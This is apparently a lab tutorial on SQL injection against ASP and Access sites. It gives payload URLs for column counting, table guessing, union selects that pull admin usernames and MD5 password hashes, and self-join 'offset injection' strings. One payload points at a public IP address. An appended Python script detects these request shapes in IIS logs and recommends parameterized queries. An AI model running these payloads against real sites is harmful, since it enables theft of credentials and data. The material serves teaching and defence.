SQL injection - access injection, access offset injection
2022-07-06 18:35:00 【Aspirin. two thousand and two】
Access injection, Access offset injection
Access database structure
Table name
Column name
Data
An Access + ASP injection lab
IIS + ASP + Access
ASP is usually paired with Access
PHP is usually paired with MySQL
ASPX is usually paired with MSSQL
Injection requires a parameter that can be passed in and that interacts with the database (data interaction).
GET, POST and cookie parameters can all be injected.
Injection process
1.1. Open a page that accepts a parameter
http://127.0.0.1/asp/Production/PRODUCT_DETAIL.asp?id=1513
1.2. Determine the injection point
'
or and 1=1, and 1=2
1.3. Determine the number of fields
127.0.0.1/asp/Production/PRODUCT_DETAIL.asp?id=1513 order by 22
127.0.0.1/asp/Production/PRODUCT_DETAIL.asp?id=1513 order by 23
22 returns normally and 23 reports an error, so the number of fields is 22.
The table being queried here is actually the product table, which turns out to have 22 columns.
1.4. Determine the table name
and exists (select * from admin)
If a table named admin exists, the page echoes normally; if it does not exist, the page echoes an error.
1.5. Union query
union select
Because this is an Access database, which only has table names, column names and content, you need to specify a table:
?id=1513 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin
admin is usually the table that stores administrator information; Access table names have to be guessed.
Testing shows positions 3 and 15, which means data can be queried at positions 3 and 15, that is, the specified columns can be read there:
http://117.24.12.33:10000/Production/PRODUCT_DETAIL.asp?id=1513 UNION SELECT 1,2,admin,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22 from admin
The password has been hashed with MD5.
Tips for guessing column names
View the source code of the admin back end (the login page).
This lab has been modified.
Access offset injection (the table name is known, but the column names cannot be guessed)
After the display positions have been revealed, determine the number of fields in the table:
127.0.0.1/asp/index.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,* from admin    (error)
127.0.0.1/asp/index.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,* from admin    (error)
127.0.0.1/asp/index.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,* from admin    (error)
And so on, until ...
127.0.0.1/asp/index.asp?id=1513 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,* from admin    (correct)
This shows that the admin table has 6 fields.
The * stands for the fields of the admin table; work out how many positions the * takes the place of.
The principle of Access offset injection. The basic formula is:
Take the number of fields found with order by and subtract the number of fields that * stands for; then take the order by field count again and subtract 2 times the number just obtained.
* = 6 characters
2 × * = 12 characters
22 - 12 = 10 characters
Revealing the column data
First-level offset: union select 1,2,3,4,5,6,7,8,9,10,* from (admin as a inner join admin as b on a.id = b.id)
If the page source shows no data after the query above, use the following method:
Second-level offset statement: union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)
Note: here the 10 fields from the first-level offset are reduced by the table's 6 fields, so the second-level offset starts with select 1,2,3,4
or union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,* from (admin as a inner join admin as b on a.id = b.id)
At this point, viewing the page source will turn up a surprise.
Mozhe range practice
The password has been hashed with MD5.
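From the defender's side, each step of this walkthrough leaves a recognizable request shape in the IIS log. The following Python example is added here and is not part of the original post; the rule names, the chosen log fields and the sample log lines (documentation IP addresses, shortened column lists) are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the request shapes this page walks through (names are illustrative).
RULES = [
    ("boolean-probe", re.compile(r"\band\s+\d+\s*=\s*\d+", re.I)),
    ("order-by-count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("exists-table-guess", re.compile(r"\bexists\s*\(\s*select\b", re.I)),
    ("union-star", re.compile(r"\bunion\s+select\b[^*]*\*\s*from\b", re.I)),
    # Offset injection: the same table joined to itself under two aliases.
    ("offset-self-join", re.compile(
        r"\bunion\s+select\b.*\bfrom\s*\(+\s*(\w+)\s+as\s+\w+\s+inner\s+join\s+\1\s+as\b",
        re.I)),
    ("union-select", re.compile(r"\bunion\s+select\b", re.I)),
]

# Constructed W3C-format sample; real IIS logs carry more fields.
LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2022-07-06 10:00:01 GET /Production/PRODUCT_DETAIL.asp id=1513 192.0.2.10 200
2022-07-06 10:00:05 GET /Production/PRODUCT_DETAIL.asp id=1513+order+by+23 198.51.100.7 500
2022-07-06 10:00:09 GET /Production/PRODUCT_DETAIL.asp id=1513%20and%20exists%20(select%20*%20from%20admin) 198.51.100.7 200
2022-07-06 10:00:12 GET /Production/PRODUCT_DETAIL.asp id=1513+union+select+1,2,3,*+from+(admin+as+a+inner+join+admin+as+b+on+a.id=b.id) 198.51.100.7 200
""".splitlines()

def classify(query):
    """Return the names of all rules matching a URL-encoded query string."""
    decoded = unquote_plus(query)
    return [name for name, rx in RULES if rx.search(decoded)]

def scan(lines):
    """Group flagged requests by client IP, using the #Fields header for layout."""
    fields, hits = [], {}
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#") or not fields or not line.strip():
            continue
        row = dict(zip(fields, line.split()))
        tags = classify(row.get("cs-uri-query", "-"))
        if tags:
            hits.setdefault(row.get("c-ip", "?"), []).append((row.get("cs-uri-stem"), tags))
    return hits

if __name__ == "__main__":
    for ip, found in scan(LOG).items():
        for stem, tags in found:
            print(ip, stem, ",".join(tags))
```

This only sees GET query strings; POST bodies and cookies, which the page notes are equally injectable, are not in the default IIS log and need request-level inspection. The fix itself belongs in the application: bind id as a typed parameter instead of concatenating it into the SQL string.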